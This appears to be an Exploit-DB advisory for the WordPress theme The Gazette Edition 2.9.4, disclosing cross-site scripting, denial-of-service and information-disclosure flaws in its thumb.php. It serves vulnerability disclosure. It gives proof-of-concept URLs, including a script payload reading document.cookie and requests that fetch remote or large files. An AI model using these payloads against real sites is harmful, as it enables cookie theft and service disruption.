WordPress Theme The Gazette Edition 2.9.4 - Multiple Vulnerabilities

EDB-ID:

35608

CVE:

N/A


Author:

MustLive

Type:

webapps


Platform:

PHP

Date:

2011-04-12


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

source: https://www.securityfocus.com/bid/47320/info

The Gazette Edition for Wordpress is prone to multiple security vulnerabilities. These vulnerabilities include multiple denial-of-service vulnerabilities, a cross-site scripting vulnerability, and an information-disclosure vulnerability.

Exploiting these issues could allow an attacker to deny service to legitimate users, gain access to sensitive information, execute arbitrary script code, or steal cookie-based authentication credentials. Other attacks may also be possible.

Gazette Edition for Wordpress 2.9.4 and prior versions are vulnerable. 

http://www.example.com/wp-content/themes/gazette/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E

http://www.example.com/wp-content/themes/gazette/thumb.php?src=http://site

http://www.example.com/wp-content/themes/gazette/thumb.php?src=http://site/big_file&h=1&w=1